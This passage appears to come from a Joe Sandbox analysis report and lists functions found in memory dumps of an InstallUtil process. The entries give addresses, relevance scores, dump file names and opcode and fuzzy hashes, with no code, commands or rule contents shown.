                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq
                                                                                                          • API String ID: 0-149360118
                                                                                                          • Opcode ID: 4763d08c3928fea90cf0a1ebf977b9cd5f6875516b030d2bafa2edbbdee238ec
                                                                                                          • Instruction ID: 2a2b49c3729dead7adb1791ab1697fc2ce3039dd4fae6914207d338759b3a4c4
                                                                                                          • Opcode Fuzzy Hash: 4763d08c3928fea90cf0a1ebf977b9cd5f6875516b030d2bafa2edbbdee238ec
                                                                                                          • Instruction Fuzzy Hash: 681140205092998FD706AF78C92429E3FF1AF86212F5445DFE002DF292CE380C45C765
                                                                                                          Function 07F937B8 Relevance: 1.3, APIs: 1, Instructions: 51COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07F93671,?,?), ref: 07F93818
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 2962429428-0
                                                                                                          • Opcode ID: 09b53f853d5a8b4380cd991232b25f02554d535021d9c35452f369fd93a14032
                                                                                                          • Instruction ID: 0433899d6173974867e1515135616706408b84ae12c018c8f03e692aee73c93f
                                                                                                          • Opcode Fuzzy Hash: 09b53f853d5a8b4380cd991232b25f02554d535021d9c35452f369fd93a14032
                                                                                                          • Instruction Fuzzy Hash: 0F1146B58002598FDB20DFA9C585BDEBBF0FF48320F14846AD558A7240C339A544CFA5
                                                                                                          Function 07F927F4 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,07F93671,?,?), ref: 07F93818
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2921651222.0000000007F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7f90000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 2962429428-0
                                                                                                          • Opcode ID: 085b9916e816c7575b90057adc7563fda1d6bd23e2d15b9409b1665a882c32f3
                                                                                                          • Instruction ID: d6ff1017feab9614bbb5210e90846f4ce67db3cc6d9b64105cdcbb3ad0e6f678
                                                                                                          • Opcode Fuzzy Hash: 085b9916e816c7575b90057adc7563fda1d6bd23e2d15b9409b1665a882c32f3
                                                                                                          • Instruction Fuzzy Hash: 4B1113B68002499FDB20DF9AC545BDEBBF4EB48320F148429D558A7350D378A944CFA5
                                                                                                          Function 085EDE78 Relevance: .4, Instructions: 440COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6221b3666b40c823ae816418465f184045450f39eaffb61cf64432bf95885f81
                                                                                                          • Instruction ID: 4b787e9c5a934e7b2651f6dc86e3818cdd50206a5a01ef878709315cf9e65dde
                                                                                                          • Opcode Fuzzy Hash: 6221b3666b40c823ae816418465f184045450f39eaffb61cf64432bf95885f81
                                                                                                          • Instruction Fuzzy Hash: 6BE19E30B102118FD708FFB9D89966DBBF1FB8C618F514869D489EB391DA389C0AD752
                                                                                                          Function 085EE4C8 Relevance: .4, Instructions: 420COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ce7a10281df0a39b26c0629f566047413cf1d81ef9ac5341f0c19a8b279c2166
                                                                                                          • Instruction ID: 8ca7e23e145eb3bc39e9060faa4981b40e60d0a0ed558097a4637ccb4e0fffaf
                                                                                                          • Opcode Fuzzy Hash: ce7a10281df0a39b26c0629f566047413cf1d81ef9ac5341f0c19a8b279c2166
                                                                                                          • Instruction Fuzzy Hash: 28F16D75E102198FCB08AF78E94A69CBFF1FB88745F4088A8E449D7354EE349D09DB52
                                                                                                          Function 085EDE77 Relevance: .4, Instructions: 403COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b4db56979eae3ffbcb969a69688857039fe6ec18daa4d62ec44d2eae0104dd67
                                                                                                          • Instruction ID: 5ec23aec0f1c6b56bd5e111390bff2e05fa20a6b278e8e0a58f6ebf247687660
                                                                                                          • Opcode Fuzzy Hash: b4db56979eae3ffbcb969a69688857039fe6ec18daa4d62ec44d2eae0104dd67
                                                                                                          • Instruction Fuzzy Hash: B0E17B34B10211CBD708FBB9D98A66DBBF1FB8C618F404868D449EB350EE389C0AD752
                                                                                                          Function 085ED360 Relevance: .4, Instructions: 371COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 291d6fa90625b0e21b88560b184440f442d0f3660bf8b1a16650775b5b5f7542
                                                                                                          • Instruction ID: d511aa515978adcde6714663486487ca4184dfde9b0042df67949550059f5d6e
                                                                                                          • Opcode Fuzzy Hash: 291d6fa90625b0e21b88560b184440f442d0f3660bf8b1a16650775b5b5f7542
                                                                                                          • Instruction Fuzzy Hash: ABD17E31714611CFC708BF7DD989529BBF6FB88619F41896CE4898B351DE389C0ADB82
                                                                                                          Function 085EC460 Relevance: .4, Instructions: 366COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 209d1755810dde3d8e79aa3e5fb7a5ff41940e550155579360926719df911513
                                                                                                          • Instruction ID: c9a31065a8e670e80cfb6dc44fab8af3327c47176e1543fdf56c8f1265177e4a
                                                                                                          • Opcode Fuzzy Hash: 209d1755810dde3d8e79aa3e5fb7a5ff41940e550155579360926719df911513
                                                                                                          • Instruction Fuzzy Hash: 79D19031A10211CBCB08FFB9E88966DBBF6FB8C614F454468D489EB350DA389C49D792
                                                                                                          Function 085EC439 Relevance: .3, Instructions: 278COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1b91274559dcd0bee468fac1bc8b0235c487e15aff982f8bb99bc6861f4cf30c
                                                                                                          • Instruction ID: dabab025c80f175fbd8a223560119d56553a38239d233538c318a11f4bc1294c
                                                                                                          • Opcode Fuzzy Hash: 1b91274559dcd0bee468fac1bc8b0235c487e15aff982f8bb99bc6861f4cf30c
                                                                                                          • Instruction Fuzzy Hash: 36A1D131A103108FCB09EFB8E8896697FF2FF8D614F454469E489DB391DA389C49DB52
                                                                                                          Function 085E2BE8 Relevance: .3, Instructions: 252COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 007edc702e7d6a0310dbbfe293e4c5ea6e89814cb40ed284f1ca6e37e5882317
                                                                                                          • Instruction ID: 239fbc863f5acfeed62cb115aaca0d638adb52b3a2f784314fd23f60c3cf6b1b
                                                                                                          • Opcode Fuzzy Hash: 007edc702e7d6a0310dbbfe293e4c5ea6e89814cb40ed284f1ca6e37e5882317
                                                                                                          • Instruction Fuzzy Hash: F581A471A10515CBCB08BFBDD88916DBBF5FB88608F41492CE489AB348DE389C1DD792
                                                                                                          Function 085E2BE7 Relevance: .2, Instructions: 250COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8a24d0a27576669fff0f1cfb3eb2efe69529749ec92f96277fc3bacada870fe0
                                                                                                          • Instruction ID: b218fee6507a615d199cf522eba78f2dca2bb2471a9710dc8940b031eb55af32
                                                                                                          • Opcode Fuzzy Hash: 8a24d0a27576669fff0f1cfb3eb2efe69529749ec92f96277fc3bacada870fe0
                                                                                                          • Instruction Fuzzy Hash: FA81A471A10515CBCB08BFBDD88916DBBF5FB88608F41492DE489AB348DE388C5DD792
                                                                                                          Function 031DCA50 Relevance: .2, Instructions: 234COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1367bda8c3abc82c00ff679bfff1ee87c15bf229df965b58be5756cdbea5b2c0
                                                                                                          • Instruction ID: f79e7bd9f98399b76bee822365d07ee837e53ce5d053bb5d12753697a75ac9dc
                                                                                                          • Opcode Fuzzy Hash: 1367bda8c3abc82c00ff679bfff1ee87c15bf229df965b58be5756cdbea5b2c0
                                                                                                          • Instruction Fuzzy Hash: 8081B130F402199BCB08DB68C45466EBBF3AF8E710F298959D915AF395DB319C42CBD1
                                                                                                          Function 085EF902 Relevance: .2, Instructions: 167COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 77a1a1fdb100a28ad7631f9e9aefce7a7777c54477b4b05f326bb22704867757
                                                                                                          • Instruction ID: 1362b12826799cada41177af227585b15507a0db72e5bfb8a5b3f0477bfe8fda
                                                                                                          • Opcode Fuzzy Hash: 77a1a1fdb100a28ad7631f9e9aefce7a7777c54477b4b05f326bb22704867757
                                                                                                          • Instruction Fuzzy Hash: 9751E331B102158BCB08FFBDE99962EBBF6FB88618F444468D449E7344DE349D09D792
                                                                                                          Function 085EF908 Relevance: .2, Instructions: 165COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ee3bdf71aa8860379315a8d5b0866547d85e2975b8bde0da868729eb6c76e920
                                                                                                          • Instruction ID: 87a5e0875c0a3d0203560d5ec1be5794de2e5ef6b961ce0455f2d5b5f413ee58
                                                                                                          • Opcode Fuzzy Hash: ee3bdf71aa8860379315a8d5b0866547d85e2975b8bde0da868729eb6c76e920
                                                                                                          • Instruction Fuzzy Hash: 5A51E431B102158BCB08FFBDE99962EBBF6FB88608F444568D449E7344EE349D09D792
                                                                                                          Function 085E1A40 Relevance: .1, Instructions: 107COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 98d183eed7f0d5f03b8b7e3dedcb7359e331ed49d8e6980835674dfaca2cb713
                                                                                                          • Instruction ID: 37f6ae8dfa87d5a3f147b9c05c25fa3f2f46bf814ed3faa911405241bb855036
                                                                                                          • Opcode Fuzzy Hash: 98d183eed7f0d5f03b8b7e3dedcb7359e331ed49d8e6980835674dfaca2cb713
                                                                                                          • Instruction Fuzzy Hash: DC4177B0D402598FCB14DFA9C944AEEBBF5FF88301F14856EE406A7351DB349905CBA1
                                                                                                          Function 085E248F Relevance: .1, Instructions: 93COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 31763363a05e5fab05f7763aa719f95adf717bfc553780e783ed6d3b836ced03
                                                                                                          • Instruction ID: 618b320622d3d44b4585ff309d62107e52f04c0b64a7653ee3b51c67d01557fd
                                                                                                          • Opcode Fuzzy Hash: 31763363a05e5fab05f7763aa719f95adf717bfc553780e783ed6d3b836ced03
                                                                                                          • Instruction Fuzzy Hash: C9418E30900709CFCB05DFA9C85069DBBF1FF88311F14C65EE449AB225EB70A985CB90
                                                                                                          Function 085EC276 Relevance: .1, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3a9460d83fabc617ddd6e4d074a47fa33ff425b6297334c3cbb6cd8c0e8bc63b
                                                                                                          • Instruction ID: 322c0881a8530054dd0fc3028551b7ae4541a00b238def573e278a392dd7df2f
                                                                                                          • Opcode Fuzzy Hash: 3a9460d83fabc617ddd6e4d074a47fa33ff425b6297334c3cbb6cd8c0e8bc63b
                                                                                                          • Instruction Fuzzy Hash: 8531236051E7C09FDB2357B89C296643F70AE57225B1A52DFE4D2CF0F3CA59881AD322
                                                                                                          Function 0178D4CC Relevance: .1, Instructions: 75COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2902459623.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_178d000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 488e97662f82c200f79aaafd8725a993ea41d4822b9361c2194b1d7dfaf131c6
                                                                                                          • Instruction ID: e1d73957c19eeb69f8f266739bea1f206aee9c4c04356c8516c6af190e018b02
                                                                                                          • Opcode Fuzzy Hash: 488e97662f82c200f79aaafd8725a993ea41d4822b9361c2194b1d7dfaf131c6
                                                                                                          • Instruction Fuzzy Hash: 1C2136B1580200DFDB15EF58D9C0B26FF65FB98328F30C5AAE9094A296C336D446C6B1
                                                                                                          Function 031D69A8 Relevance: .1, Instructions: 74COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 65189768dee14397765e5a7f900f6bed3921d5d911d9d6320017d16a3ede3d2e
                                                                                                          • Instruction ID: db1093fb15fccd0e37f4529297bd4160fdf3e2fccc9e6174653efbff0b95419b
                                                                                                          • Opcode Fuzzy Hash: 65189768dee14397765e5a7f900f6bed3921d5d911d9d6320017d16a3ede3d2e
                                                                                                          • Instruction Fuzzy Hash: 51219F353006259FC729DA69D45492EF796FB8EA54B098179E90ACB354CF30DC02CBC0
                                                                                                          Function 0179D01C Relevance: .1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2902596893.000000000179D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0179D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_179d000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 651d8cac2af39685866e50be2e4628a6e97b1b962dc7453aeb9dbc0946dd3f32
                                                                                                          • Instruction ID: df960c823bacf0bdf8a5c2b3ba109e2ca281bcd34b061b7f1bc7a45ab28d0faa
                                                                                                          • Opcode Fuzzy Hash: 651d8cac2af39685866e50be2e4628a6e97b1b962dc7453aeb9dbc0946dd3f32
                                                                                                          • Instruction Fuzzy Hash: 12210071604200DFDF25DFACE984B26FBA5EB88354F20C5A9D80A4B256C33AD44ACA61
                                                                                                          Function 0179D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2902596893.000000000179D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0179D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_179d000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9360d65dd4b6bebf5508116c48894903d2ad1afa3b286f58b71d481391e8097f
                                                                                                          • Instruction ID: 1f8635df9491a4f71adbbebb1514c0eb2593addf4ef9d853c3ac3bae4fccff8c
                                                                                                          • Opcode Fuzzy Hash: 9360d65dd4b6bebf5508116c48894903d2ad1afa3b286f58b71d481391e8097f
                                                                                                          • Instruction Fuzzy Hash: B7210771508200DFDF15DF98E6C0B26FBA5FB84324F20C5EDD9094B296C336D44ACA61
                                                                                                          Function 085E26C8 Relevance: .1, Instructions: 68COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2922352607.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_85e0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 54c07c75bf229e03c0125ba5e17729e5e73c7a675ce18d571d07ffe4c8f5c2e7
                                                                                                          • Instruction ID: 49a668504d04d6d80687b3dc860d28d8ece861938e65b863c8c0deb32dd8a001
                                                                                                          • Opcode Fuzzy Hash: 54c07c75bf229e03c0125ba5e17729e5e73c7a675ce18d571d07ffe4c8f5c2e7
                                                                                                          • Instruction Fuzzy Hash: B731E3B0D00218DFDB24DF99C988B8EBBF6BB48314F24845AE408BB254C7B56845CFA0
                                                                                                          Function 031D643F Relevance: .1, Instructions: 66COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1d71dda1a439a8995b9bb8cefb19d6bc1891ff51ab139a03e58212da0474c73f
                                                                                                          • Instruction ID: 1aeafc673a87530f533d4d90fcbaa05f2dbc9e961863d5883fa838e3df755e5b
                                                                                                          • Opcode Fuzzy Hash: 1d71dda1a439a8995b9bb8cefb19d6bc1891ff51ab139a03e58212da0474c73f
                                                                                                          • Instruction Fuzzy Hash: B711E630A00615DFC714DE28D448A6DBBB6EF9E721F598169E905CB351DB70DC42CB91
                                                                                                          Function 031D09E8 Relevance: .1, Instructions: 65COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 097c6c368a36c24b884770c2eafcca46b3d8af3b48903d4dbcbceda8fb36e1f8
                                                                                                          • Instruction ID: c03ebdbfb947062713e01c8eb78f1a3bd25cf370197ac8beb2a9072a3e27bf57
                                                                                                          • Opcode Fuzzy Hash: 097c6c368a36c24b884770c2eafcca46b3d8af3b48903d4dbcbceda8fb36e1f8
                                                                                                          • Instruction Fuzzy Hash: 37215932C4D2A98FD716CB78DC2029ABF74EB4F240F0A9597C599D7142C374960ECB92
                                                                                                          Function 031D6998 Relevance: .1, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 08604e1597134a2743783ae895140fd45abb320ae27453e72acc9f878d85026e
                                                                                                          • Instruction ID: db358f1fd6d86e36d1813a090a5291c6b34d1509a3a0b6ffa5531d512b899e1b
                                                                                                          • Opcode Fuzzy Hash: 08604e1597134a2743783ae895140fd45abb320ae27453e72acc9f878d85026e
                                                                                                          • Instruction Fuzzy Hash: B41127317056118FC7198F6AD86453EFBA6BF8E65070980B9E806CF360CF20DC01C790
                                                                                                          Function 031D0838 Relevance: .1, Instructions: 61COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c018516b0c7c8cdd6eb080a3ff9f11060aab4dcdf367f34ab4df6e0ae5e2ef77
                                                                                                          • Instruction ID: eb0ccd0ae8dfd66c4370bc936b8721a5ef995ff028cea2fa8e67314d2abebae7
                                                                                                          • Opcode Fuzzy Hash: c018516b0c7c8cdd6eb080a3ff9f11060aab4dcdf367f34ab4df6e0ae5e2ef77
                                                                                                          • Instruction Fuzzy Hash: DB214270D442099FDF05DFA8D4A06EEBFB2FF89700F108569C111AB365DB355A0ADB91
                                                                                                          Function 0178D4C7 Relevance: .1, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2902459623.000000000178D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0178D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_178d000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                          • Instruction ID: 1c859a89327d5d46a44e183a32656587486dccfdcddaeccc84457b334f275b3d
                                                                                                          • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                          • Instruction Fuzzy Hash: 6511DF72444240CFCB12DF54D5C4B16FF62FB94324F34C6AAD8090B296C336D55ACBA1
                                                                                                          Function 031D0848 Relevance: .1, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2903398659.00000000031D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_31d0000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5e713d39ecb5bd2ed925dc56091860279204cdc8c260a73b31e843fc4d6a0b7b
                                                                                                          • Instruction ID: 863ee3b7f0df93181dbe9dbda2430781d0bfb71950b03b0142d1a5f1b171c6bd
                                                                                                          • Opcode Fuzzy Hash: 5e713d39ecb5bd2ed925dc56091860279204cdc8c260a73b31e843fc4d6a0b7b
                                                                                                          • Instruction Fuzzy Hash: DE110D70D4010A9FDF04EBA8D4906AEBBB6FF88700F108525C1126B364DF355A099B91
                                                                                                          Function 0179D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2902596893.000000000179D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0179D000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_179d000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                          • Instruction ID: ab59aa10d3ec439465c3def672916939017bbe02d0e9b2770b1928f93e6acd01
                                                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                          • Instruction Fuzzy Hash: 59118B75508280DFDB16CF54D5C4B15FFA1FB84224F24C6AAD8494B696C33AD44ACB61
                                                                                                          Function 0179D017 Relevance: .1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.2902596893.000000000179D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0179D000, based on PE: false
